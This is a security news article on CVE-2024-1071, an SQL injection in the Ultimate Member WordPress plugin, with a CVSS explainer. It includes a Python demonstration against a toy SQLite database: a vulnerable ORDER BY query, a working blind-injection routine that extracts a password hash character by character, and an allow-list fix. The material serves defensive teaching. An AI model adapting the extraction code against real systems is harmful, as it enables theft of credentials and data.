CVE-2024-1071 WordPress Plugin Vulnerability

A critical security vulnerability has been disclosed in Ultimate Member, a widely used WordPress plugin with over 200,000 active installations. Tracked as CVE-2024-1071, the flaw carries a CVSS score of 9.8 out of 10 (Critical) and was discovered and reported by security researcher Christiaan Swiers. As detailed in an advisory from Wordfence, a WordPress security company, plugin versions 2.1.3 through 2.8.2 are vulnerable to SQL injection through the 'sorting' parameter, owing to inadequate escaping of the user-supplied value and insufficient preparation of the existing SQL query.

The flaw can be exploited by unauthenticated attackers to append additional SQL queries to existing ones and extract sensitive data from the database. It only affects sites on which the "Enable custom table for usermeta" option has been turned on in the plugin settings, so administrators should check that setting when assessing exposure.
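The bug class described above, as an added example written for this article rather than code from Ultimate Member or WordPress: a sort parameter is concatenated into an ORDER BY clause, which cannot be protected by a bound placeholder, so an attacker turns the sort expression into a boolean oracle and reads a secret from another table one character at a time. The example uses Python with an in-memory SQLite database so it runs offline; the table names, the stored hash value and the exact query shape are constructed assumptions and do not reproduce the plugin's real query. The hardened version maps the user-supplied name onto a fixed column through an allow-list.

```python
"""Added example: ORDER BY injection through an unvalidated 'sorting' value.

Illustrative code for this article, not code from the Ultimate Member plugin
or WordPress. Table names, rows and the secret hash are constructed.
"""
import sqlite3

# Constructed secret the attacker wants to read (not a real hash).
SECRET_HASH = "$P$Bexample"


def make_db() -> sqlite3.Connection:
    """Build a small usermeta-style database in memory (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
        CREATE TABLE wp_um_metadata (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    conn.execute("INSERT INTO wp_users VALUES (1, 'admin', ?)", (SECRET_HASH,))
    conn.executemany(
        "INSERT INTO wp_um_metadata VALUES (?, 'nickname', ?)",
        [(1, "zed"), (2, "alice"), (3, "mike")],
    )
    return conn


def vulnerable_query(conn, sorting: str):
    """Bug pattern: the WHERE value is bound, but the sort expression is
    concatenated into the SQL text, so whatever the user sends runs as SQL."""
    sql = ("SELECT user_id, meta_value FROM wp_um_metadata "
           "WHERE meta_key = ? ORDER BY " + sorting)
    return conn.execute(sql, ("nickname",)).fetchall()


# Allow-list: the only sort keys the application supports, mapped to real columns.
ALLOWED_SORT = {"user_id": "user_id", "nickname": "meta_value"}


def safe_query(conn, sorting: str, direction: str = "ASC"):
    """Fix: ORDER BY cannot take a placeholder, so look the requested key up in
    a fixed allow-list and reject anything else instead of escaping it."""
    if sorting not in ALLOWED_SORT or direction.upper() not in ("ASC", "DESC"):
        raise ValueError("unsupported sort parameter")
    sql = (f"SELECT user_id, meta_value FROM wp_um_metadata WHERE meta_key = ? "
           f"ORDER BY {ALLOWED_SORT[sorting]} {direction.upper()}")
    return conn.execute(sql, ("nickname",)).fetchall()


def sort_is_rejected(conn, sorting: str) -> bool:
    """True if the hardened query refuses the given sort value."""
    try:
        safe_query(conn, sorting)
    except ValueError:
        return True
    return False


def oracle(conn, condition: str) -> bool:
    """Boolean oracle built from the sort order: when the condition holds the
    rows sort by user_id (row 1, 'zed', comes first); otherwise they sort by
    meta_value ('alice' comes first). No error message is needed."""
    payload = f"(CASE WHEN ({condition}) THEN user_id ELSE meta_value END)"
    rows = vulnerable_query(conn, payload)
    return rows[0][0] == 1


def extract_secret_blind(conn, max_len: int = 32) -> str:
    """Recover wp_users.user_pass for ID 1 one printable character at a time.
    unicode('') is NULL in SQLite, so the oracle goes false past the end."""
    recovered = ""
    for pos in range(1, max_len + 1):
        found = None
        for code in range(33, 127):
            cond = (f"(SELECT unicode(substr(user_pass, {pos}, 1)) "
                    f"FROM wp_users WHERE ID = 1) = {code}")
            if oracle(conn, cond):
                found = chr(code)
                break
        if found is None:
            break
        recovered += found
    return recovered


if __name__ == "__main__":
    db = make_db()
    print("leaked via vulnerable ORDER BY:", extract_secret_blind(db))
    print("hardened query rejects payload:",
          sort_is_rejected(db, "(CASE WHEN 1=1 THEN user_id ELSE meta_value END)"))
```

The point of the allow-list is that escaping does not help here: the sort value is an SQL identifier or expression, not a string literal, so quoting functions leave it executable. Mapping the request onto a fixed set of column names is the only reliable fix for ORDER BY.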

Following responsible disclosure on January 30, 2024, the plugin developers addressed the vulnerability in version 2.8.3, released on February 19. Users are strongly advised to update to the latest version without delay: Wordfence reported that it had already blocked one attempt to exploit the flaw in the 24 hours before publishing its advisory.

It is worth noting that another critical vulnerability in the same plugin (CVE-2023-3460, CVSS score: 9.8) was actively exploited by threat actors in July 2023. That flaw allowed them to create unauthorized administrator accounts and take control of vulnerable sites.

What is the CVSS Rating System for Vulnerabilities?

The Common Vulnerability Scoring System (CVSS) is a standardized scoring system used to assess and communicate the severity of vulnerabilities in software systems. It provides a common framework for organizations and individuals to evaluate the impact of security vulnerabilities. The CVSS is designed to be vendor-agnostic and is widely adopted in the cybersecurity community.

The CVSS assigns a numerical score to a vulnerability based on several factors: how exploitable it is (attack vector, attack complexity, privileges required), whether exploitation requires user interaction, and its impact on the confidentiality, integrity, and availability of the affected system. Scores range from 0 to 10, with higher scores indicating more severe vulnerabilities; under CVSS v3, 9.0 and above is rated Critical, which is why the 9.8 assigned to CVE-2024-1071 falls in the top band.

The CVSS has gone through several versions. CVSS v3.1, released in 2019, is the version most advisories (including the Wordfence advisory above) still use, and it refined the metric definitions and rounding rules of earlier versions; CVSS v4.0 was published in November 2023 and is gradually being adopted alongside it.

The "Common Vulnerabilities and Exposures" (CVE) system, on the other hand, is a separate initiative that assigns unique identifiers, called CVE IDs, to publicly disclosed vulnerabilities. The CVE system does not provide severity scores on its own; it is used together with the CVSS, the CVE ID naming the flaw and the CVSS score rating its severity.

February 29, 2024